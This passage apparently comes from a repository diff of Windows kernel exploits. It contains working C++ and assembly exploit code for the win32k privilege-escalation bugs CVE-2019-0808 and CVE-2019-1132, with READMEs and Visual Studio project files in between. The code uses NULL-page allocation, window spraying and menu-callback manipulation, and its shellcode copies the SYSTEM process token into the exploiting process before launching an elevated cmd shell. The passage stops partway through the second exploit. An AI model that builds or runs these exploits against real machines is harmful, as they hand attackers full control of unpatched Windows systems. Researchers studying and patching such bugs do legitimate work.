using pNtAllocateVirtualMemory = NTSTATUS(__stdcall*)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
__declspec(naked) void __stdcall NtUserMNDragOver(PPOINT pt, char* buf)
{
__asm
{
mov eax, 0x11ED
mov edx, 0x7FFE0300
call dword ptr[edx]
ret 8
}
}
#endif // _AMD64_
//////////////////////////////////////////////////////////////////////////////////
//
// FakeWindowsProcedure for hMenuSub's tagMenuWnd
//
LRESULT CALLBACK FakeWindowProc(
_In_ HWND hwnd,
_In_ UINT uMsg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (uMsg == MN_FINDMENUWINDOWFROMPOINT)
{
SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG_PTR)DefWindowProc);
cout << "wParam:0x" << hex << *(PULONG)wParam << endl;
g_uDraggingIndex = *(PULONG)wParam ;
SetNullPageData();
return (LRESULT)g_fakeWnd;
}
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
//////////////////////////////////////////////////////////////////////////////////
//
// SetWindowsHookEx's handler
//
LRESULT CALLBACK CallWndProc(
_In_ int nCode,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
PCWPSTRUCT msg = (PCWPSTRUCT)lParam;
//__debugbreak();
if (msg->message == MN_FINDMENUWINDOWFROMPOINT && bOnDrag)
{
cout << "msg: 0x" << hex << msg->message;
cout << "\thwnd: 0x" << hex << msg->hwnd;
auto hwnd_kernel = p_leak.GetUserObjectAddressBygSharedInfo(msg->hwnd, NULL);
cout << "\thwnd_kernel: 0x" << hex << hwnd_kernel << endl;
SetWindowLongPtr(msg->hwnd, GWLP_WNDPROC, (ULONG_PTR)FakeWindowProc);
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
//////////////////////////////////////////////////////////////////////////////////
//
// SetWinEventHook's handler
//
void Wineventproc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hwnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime
)
{
PVOID hMenuRoot_wnd;
PVOID hMenSub_wnd;
switch (g_MenuCreate)
{
case 0:
//__debugbreak();
SendMessage(hwnd, WM_LBUTTONDOWN, NULL, 0x00050005); //在TrackPopupMenuEx内部通过xxxWindowEvent产生EVENT_SYSTEM_MENUPOPUPSTART事件但是并没有立即产生用户回调
//而是在
//此时是hMenuRoot
hMenuRoot_wnd = p_leak.GetUserObjectAddressBygSharedInfo(hwnd, NULL);
cout << "hMenuRoot_wnd: 0x" << hex << hwnd << "\tkernelAddress: 0x" << hMenuRoot_wnd << endl;
break;
case 1:
//__debugbreak();
/*
bOnDrag = 1; //在这里将bOnDrag置1虽然在WM_MOUSEMOVE消息处理函数xxxMouseMove中调用xxxMNFindWindowFromPoint时返回的是我们伪造的 g_fakeWnd
//但由于tagMenuState->fInDoDragDrop并没有置位因此不会触发调用xxxMNUpdateDraggingInfo的代码路径所以还是通过调用NtUserMNDragOver将fInDoDragDrop置位
*/
SendMessage(hwnd, WM_MOUSEMOVE, NULL, 0x00050005); //当在hWndMain中处理了我们发送的WM_LBUTTONDOWN之后此时hMenuSub会显示同时会触发
//EVENT_SYSTEM_MENUPOPUPSTART用户回调这时发送WM_MOUSEMOVE消息由于鼠标已经是按下情况
//因此会形成拖拽
hMenSub_wnd = p_leak.GetUserObjectAddressBygSharedInfo(hwnd, NULL);
cout << "hMenSub_wnd: 0x" << hex << hwnd << "\tkernelAddress: 0x" << hMenSub_wnd << endl;
break;
default:
break;
}
g_MenuCreate++;
}
//////////////////////////////////////////////////////////////////////////////////
//
// allocated NULL page
//
bool allocNullPage()
{
pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtAllocateVirtualMemory");
if (NtAllocateVirtualMemory == NULL)
{
cout << "get NtAllocateVirtualMemory address error\n";
return false;
}
ULONG_PTR addr = 0x100;
ULONG_PTR RegionSize = 0x1000;
auto result = NtAllocateVirtualMemory(GetCurrentProcess(), (PVOID*)&addr, NULL, &RegionSize, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if (result != 0)
{
cout << "NtAllocateVirtualMemory error code:0x" << hex << result << endl;
return false;
}
return true;
}
//////////////////////////////////////////////////////////////////////////////////
//
// set NULL page data
//
void SetNullPageData()
{
#ifdef _AMD64_
uint8_t NullPage = NULL;
ULONG_PTR offset1 = (ULONG_PTR)g_primaryWnd - g_uDraggingIndex * 0x90; // 注意g_uDraggingIndex必须是ULONG_PTR否则ULONG在x64会发生溢出
offset1 = offset1 + 0xe8 - 0x4;
ULONG_PTR offset2 = (((ULONG_PTR)prepareToRead_addr + 0x128 + 0x90) - offset1 - 0x44) / 0x90; //由于offset2只取了32位而计算出来可能超过32位因此无法重定位到零地址
for (size_t i = 0; i < 0x90; i += 8)
{
//__debugbreak();
SetWindowLongPtr(g_prepareToRead, i, 0x7777777777777777);
}
*(PULONG_PTR)(NullPage + 0x34) = g_uDraggingIndex + 1;
*(PULONG_PTR)(NullPage + 0x50) = offset1;
*(PULONG_PTR)(NullPage + 0x78) = offset2;
#else
uint8_t NullPage = NULL;
ULONG_PTR offset1 = (ULONG_PTR)g_primaryWnd - g_uDraggingIndex * 0x6C; // sizeof(tagItem32) = 0x6C
offset1 = offset1 + 0x90 - 0x4; // point to g_primaryWnd->cbwndExtra
ULONG_PTR offset2 = (0 - offset1) / 0x6C + 2; //如果只+1遇到刚好NullPage + 0x28 + (1*0x6C - offset2_remainder) = 0x4C
//的情况就会覆盖offset2的值导致蓝屏
ULONG_PTR offset2_remainder = (0 - offset1) % 0x6C;
*(PULONG_PTR)(NullPage + 0x20) = g_uDraggingIndex + 1; //tagMENU->cItems, g_uDraggingIndex + 1使得xxxMNSetGapState!MNGetpItem第二次返回0
*(PULONG_PTR)(NullPage + 0x34) = offset1;
*(PULONG_PTR)(NullPage + 0x4C) = offset2;
*(PULONG_PTR)(NullPage + 0x28 + (2 * 0x6C - offset2_remainder)) = 0x7ffffffe;
#endif // _AMD64_
}
//////////////////////////////////////////////////////////////////////////////////
//
// spary window
//
bool SparyWindow()
{
WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = GetModuleHandle(NULL);
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "SparyClass";
RegisterClassExA(&wndClass);
for (size_t i = 0; i < 0x100; i++)
{
g_SparyWindow[i] = CreateWindowA("SparyClass", NULL, WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, GetModuleHandle(NULL), nullptr);
if (g_SparyWindow[i] == NULL)
{
return false;
}
}
g_primaryWnd = p_leak.GetUserObjectAddressBygSharedInfo(g_SparyWindow[0x98], NULL);
g_secondWnd = p_leak.GetUserObjectAddressBygSharedInfo(g_SparyWindow[0x99], NULL);
if (((ULONG_PTR)g_secondWnd - (ULONG_PTR)g_primaryWnd) > 0x40000000)
{
return false;
}
cout << "g_primaryWnd: 0x" << hex << g_SparyWindow[0x98] << "\tkernelAddress: 0x" << g_primaryWnd << endl;
cout << "g_secondWnd: 0x" << hex << g_SparyWindow[0x99] << "\tkernelAddress: 0x" << g_secondWnd << endl;
#ifdef _AMD64_
WNDCLASSEXA wndClass2 = { 0 };
wndClass2.cbSize = sizeof(WNDCLASSEXA);
wndClass2.lpfnWndProc = DefWindowProc;
wndClass2.cbClsExtra = 0;
wndClass2.cbWndExtra = 0x90;
wndClass2.hInstance = GetModuleHandle(NULL);
wndClass2.lpszMenuName = 0;
wndClass2.lpszClassName = "SparyClass2";
RegisterClassExA(&wndClass2);
g_prepareToRead = CreateWindowA("SparyClass2", NULL, WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, GetModuleHandle(NULL), nullptr);
prepareToRead_addr = p_leak.GetUserObjectAddressBygSharedInfo(g_prepareToRead, NULL);
cout << "g_prepareToRead: 0x" << hex << g_prepareToRead << "\tkernelAddress: 0x" << prepareToRead_addr << endl;
#endif // _AMD64_
return true;
}
//////////////////////////////////////////////////////////////////////////////////
//
// entry point
//
int main()
{
if (!SparyWindow())
{
return false;
}
if (!allocNullPage())
{
cout << "error in alloc null page\n";
return false;
}
SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, NULL, GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, NULL, (WINEVENTPROC)Wineventproc, GetCurrentProcessId(), GetCurrentThreadId(), NULL);
g_fakeWnd = CreateWindowEx(0, L"#32768", L"SB", 0x80800000, 0, 0, 0, 0, 0, 0, 0,0);
HMENU hMenuRoot = CreatePopupMenu();
HMENU hMenuSub = CreatePopupMenu();
MENUINFO mi = { 0 };
mi.cbSize = sizeof(MENUINFO);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_MODELESS | MNS_DRAGDROP; //非模态菜单,否则弹出菜单会被销毁
SetMenuInfo(hMenuRoot, &mi);
SetMenuInfo(hMenuSub, &mi);
AppendMenuA(hMenuRoot, MF_BYPOSITION | MF_POPUP, (UINT_PTR)hMenuSub, "Root");
AppendMenuA(hMenuSub, MF_BYPOSITION | MF_POPUP, 0, "Sub");
auto hMenuRoot_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuRoot, NULL);
auto hMenuSub_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuSub, NULL);
cout << "hMenuRoot: 0x" << hex << hMenuRoot << "\tkernelAddress: 0x" << hMenuRoot_kernel << endl;
cout << "hMenuSub: 0x" << hex << hMenuSub << "\tkernelAddress: 0x" << hMenuSub_kernel << endl;
//getchar();
WNDCLASSEXA wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXA);
wndClass.lpfnWndProc = DefWindowProc;
wndClass.cbClsExtra = 0;
wndClass.cbWndExtra = 0;
wndClass.hInstance = GetModuleHandle(NULL);
wndClass.lpszMenuName = 0;
wndClass.lpszClassName = "WNDCLASSMAIN";
RegisterClassExA(&wndClass);
auto hWndMain = CreateWindowA("WNDCLASSMAIN", "CVE", WS_DISABLED, 0, 0, 1, 1, nullptr, nullptr, GetModuleHandle(NULL), nullptr);
TrackPopupMenuEx(hMenuRoot, 0, 0, 0, hWndMain, NULL); //RECT会被强制填充为0x14,0x14
{
auto g_fakeWnd_kernel = p_leak.GetUserObjectAddressBygSharedInfo(g_fakeWnd, NULL);
auto hMenuRoot_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuRoot, NULL);
auto hMenuSub_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hMenuSub, NULL);
auto hWndMain_kernel = p_leak.GetUserObjectAddressBygSharedInfo(hWndMain, NULL);
cout << "g_fakeWnd: 0x" << hex << g_fakeWnd << "\tkernelAddress: 0x"<< g_fakeWnd_kernel << endl;
cout << "hMenuRoot: 0x" << hex << hMenuRoot << "\tkernelAddress: 0x" << hMenuRoot_kernel << endl;
cout << "hMenuSub: 0x" << hex << hMenuSub << "\tkernelAddress: 0x" << hMenuSub_kernel << endl;
cout << "hWndMain: 0x" << hex << hWndMain << "\tkernelAddress: 0x" << hWndMain_kernel << endl;
}
cout << "CallWndProc: 0x" << hex << CallWndProc << endl;
MSG msg = { 0 };
while (GetMessage(&msg,NULL,NULL,NULL))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
if (g_MenuCreate == 2)
{
bOnDrag = true;
POINT pt;
char buf[100];
pt.x = 2;
pt.y = 2;
//__debugbreak();
NtUserMNDragOver(&pt, buf);
g_MenuCreate++;
break;
}
}
DestroyWindow((HWND)g_fakeWnd);
DestroyWindow(hWndMain);
DestroyMenu(hMenuRoot);
DestroyMenu(hMenuSub);
replaceWndProc();
return true;
}
LRESULT CALLBACK WndProc_kernel(
_In_ HWND hwnd,
_In_ UINT uMsg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
#ifdef _AMD64_
ShellCode();
#else
__asm {
pushad
mov eax, fs: [0x124] //CurrentThread
mov eax, [eax + 0x150] //Process
lea edx, [eax + 0xf8] //MyProcess.Token
noFind :
mov eax, [eax + 0xb8] //Eprocess.ActiveProcessLinks
sub eax, 0xb8 //next Eprocess struct
mov ebx, [eax + 0xb4] //PID
cmp ebx, 4
jnz noFind
mov eax, [eax + 0xf8] //System.Token
mov[edx], eax
popad
}
#endif // _AMD64_
SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG_PTR)DefWindowProc);
return false;
}
void replaceWndProc()
{
#ifdef _AMD64_
ULONG_PTR offset = (((ULONG_PTR)g_secondWnd + 0x90) - ((ULONG_PTR)g_primaryWnd + 0x128));
#else
ULONG_PTR offset = (((ULONG_PTR)g_secondWnd + 0x60) - ((ULONG_PTR)g_primaryWnd + 0xb0));
#endif // _AMD64_
SetWindowLongPtr(g_SparyWindow[0x98], offset, (ULONG_PTR)WndProc_kernel);
SendMessage(g_SparyWindow[0x99], WM_MOUSEMOVE, NULL, 0x00050005); //触发g_secondWnd的消息处理函数
system("cmd");
DestroyWindow(g_SparyWindow[0x98]);
DestroyWindow(g_SparyWindow[0x99]);
}

44
00-CVE_EXP/CVE-2019-0808/src/x64.asm Normal file
View File

@ -0,0 +1,44 @@
public ShellCode
public NtUserMNDragOver
.code
ShellCode proc
pushfq
push rax
push rdx
push rbx
mov rax, gs:[188h] ;CurrentThread
mov rax, [rax + 210h] ;Process
lea rdx, [rax + 208h] ;MyProcess.Token
noFind :
mov rax, [rax + 188h] ;Eprocess.ActiveProcessLinks
sub rax, 188h ;next Eprocess struct
mov rbx, [rax + 180h] ;PID
cmp rbx, 4
jnz noFind
mov rax, [rax + 208h] ;System.Token
mov [rdx], rax
pop rbx
pop rdx
pop rax
popfq
ret
ShellCode endp
NtUserMNDragOver proc
mov r10, rcx
mov eax, 12DEh
syscall
ret
NtUserMNDragOver endp
end

33
00-CVE_EXP/CVE-2019-1132/README.md Normal file
View File

@ -0,0 +1,33 @@
### CVE-2019-1132
#### 描述
Win32k特权提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1132
```
#### 利用方式
暂无
#### 分析文档
- https://zhuanlan.zhihu.com/p/335166796
- https://ti.qianxin.com/blog/articles/buhtrap-cve-2019-1132-attack-event-related-vulnerability-sample-analysis/
- https://www.welivesecurity.com/2019/07/10/windows-zero-day-cve-2019-1132-exploit/
- https://www.anquanke.com/post/id/181794

34
00-CVE_EXP/CVE-2019-1132/README_EN.md Normal file
View File

@ -0,0 +1,34 @@
### CVE-2019-1132
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows 7 | x64/x86 | | SP1 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1132
```
#### Utilization
None
#### Analyze
- https://zhuanlan.zhihu.com/p/335166796
- https://ti.qianxin.com/blog/articles/buhtrap-cve-2019-1132-attack-event-related-vulnerability-sample-analysis/
- https://www.welivesecurity.com/2019/07/10/windows-zero-day-cve-2019-1132-exploit/
- https://www.anquanke.com/post/id/181794

31
00-CVE_EXP/CVE-2019-1132/src/cve-2019-1132.sln Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.539
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2019-1132", "cve-2019-1132.vcxproj", "{998F330A-9512-4212-BC87-A6867DC715D9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x64.ActiveCfg = Debug|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x64.Build.0 = Debug|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x86.ActiveCfg = Debug|Win32
{998F330A-9512-4212-BC87-A6867DC715D9}.Debug|x86.Build.0 = Debug|Win32
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x64.ActiveCfg = Release|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x64.Build.0 = Release|x64
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x86.ActiveCfg = Release|Win32
{998F330A-9512-4212-BC87-A6867DC715D9}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {34444CE2-76FE-414E-8862-2F2B23514E75}
EndGlobalSection
EndGlobal

124
00-CVE_EXP/CVE-2019-1132/src/cve-2019-1132.vcxproj Normal file
View File

@ -0,0 +1,124 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>15.0</VCProjectVersion>
<ProjectGuid>{998F330A-9512-4212-BC87-A6867DC715D9}</ProjectGuid>
<RootNamespace>cve20191132</RootNamespace>
<WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="main.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

4
00-CVE_EXP/CVE-2019-1132/src/cve-2019-1132.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

373
00-CVE_EXP/CVE-2019-1132/src/main.cpp Normal file
View File

@ -0,0 +1,373 @@
#include <Windows.h>
#include <iostream>
/* PREPROCESSOR DEFINITIONS */
#define MN_SELECTITEM 0x1E5
#define MN_SELECTFIRSTVALIDITEM 0x1E7
#define MN_OPENHIERARCHY 0x01E3
#define MN_CANCELMENUS 0x1E6
#define MN_BUTTONDOWN 0x1ed
#define WM_EX_TRIGGER 0x6789
#define NtCurrentProcess() (HANDLE)-1
#define NtCurrentThread() (HANDLE)-1
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define TYPE_WINDOW 1
/* GLOBAL VARIABLES */
static BOOL hWindowHuntDestroy = FALSE;
static BOOL bEnterEvent = FALSE;
static BOOL success = FALSE;
static HMENU hMenuList[3] = { 0 };
static HWND hWindowMain = NULL;
static HWND hWindowHunt = NULL;
static HWND hwndMenuList[3] = { 0 };
static PVOID MemAddr = (PVOID)1;
static SIZE_T MemSize = 0x1000;
static DWORD iCount = 0;
static DWORD release = 0;
/* Structure definition of win32k!tagWND returned by xxHMValidateHandle */
typedef struct _HEAD {
HANDLE h;
DWORD cLockObj;
} HEAD, *PHEAD;
typedef struct _THROBJHEAD {
HEAD head;
PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;
typedef struct _DESKHEAD {
PVOID rpdesk;
PBYTE pSelf;
} DESKHEAD, *PDESKHEAD;
typedef struct _THRDESKHEAD {
THROBJHEAD thread;
DESKHEAD deskhead;
} THRDESKHEAD, *PTHRDESKHEAD;
/* Definition of xxHMValidateHandle */
static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
/* Defintion of NtallocateVirtualMemory */
typedef
NTSTATUS
(WINAPI *pfNtAllocateVirtualMemory) (
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
pfNtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;
static
VOID
xxGetHMValidateHandle(VOID)
{
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
PBYTE Address = NULL;
for (INT i = 0; i < 0x30; i++)
{
if (*(WORD *)(i + pfnIsMenu) != 0x02B2)
{
continue;
}
i += 2;
if (*(BYTE *)(i + pfnIsMenu) != 0xE8)
{
continue;
}
Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
Address = Address + i + 5;
pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
break;
}
}
static
PVOID
xxHMValidateHandleEx(HWND hwnd)
{
return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
}
static
PVOID
xxHMValidateHandle(HWND hwnd)
{
PVOID RetAddr = NULL;
if (!pfnHMValidateHandle)
{
xxGetHMValidateHandle();
}
if (pfnHMValidateHandle)
{
RetAddr = xxHMValidateHandleEx(hwnd);
}
return RetAddr;
}
static
BOOL
xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra, WNDPROC pfnProc = DefWindowProcW)
{
WNDCLASSEXW wc = { 0 };
wc.cbSize = sizeof(WNDCLASSEXW);
wc.lpfnWndProc = pfnProc;
wc.cbWndExtra = cbWndExtra;
wc.hInstance = GetModuleHandleA(NULL);
wc.lpszMenuName = NULL;
wc.lpszClassName = lpszClassName;
return RegisterClassExW(&wc);
}
static
HWND
xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle, HINSTANCE hInstance = NULL, HWND hwndParent = NULL)
{
return CreateWindowExW(dwExStyle,
lpszClassName,
NULL,
dwStyle,
0,
0,
1,
1,
hwndParent,
NULL,
hInstance,
NULL);
}
static
LRESULT
CALLBACK
xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
if (cwp->message == WM_NCCREATE && bEnterEvent && hwndMenuList[release] && !hwndMenuList[release+1])
{
printf("Sending the MN_CANCELMENUS message\n");
SendMessage(hwndMenuList[release], MN_CANCELMENUS, 0, 0);
bEnterEvent = FALSE;
}
return CallNextHookEx(0, code, wParam, lParam);
}
static
VOID
CALLBACK
xxWindowEventProc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hwnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime
)
{
UNREFERENCED_PARAMETER(hWinEventHook);
UNREFERENCED_PARAMETER(event);
UNREFERENCED_PARAMETER(idObject);
UNREFERENCED_PARAMETER(idChild);
UNREFERENCED_PARAMETER(idEventThread);
UNREFERENCED_PARAMETER(dwmsEventTime);
bEnterEvent = TRUE;
if (iCount < ARRAYSIZE(hwndMenuList))
{
hwndMenuList[iCount] = hwnd;
iCount++;
}
SendMessageW(hwnd, MN_SELECTITEM, 0, 0);
SendMessageW(hwnd, MN_SELECTFIRSTVALIDITEM, 0, 0);
PostMessageW(hwnd, MN_OPENHIERARCHY, 0, 0);
}
__declspec(noinline) int Shellcode()
{
__asm {
xor eax, eax // Set EAX to 0.
mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
// _KTHREAD is located at FS:[0x124]
mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
mov ecx, eax // Copy current process _EPROCESS structure
mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4
SearchSystemPID:
mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0B8h
cmp[eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID
mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + 0xF8], edx // Assign SYSTEM process token.
}
}
static
LRESULT
WINAPI
xxMainWindowProc(
_In_ HWND hwnd,
_In_ UINT msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (msg == 0x1234)
{
WORD um = 0;
__asm
{
// Grab the value of the CS register and
// save it into the variable UM.
//int 3
mov ax, cs
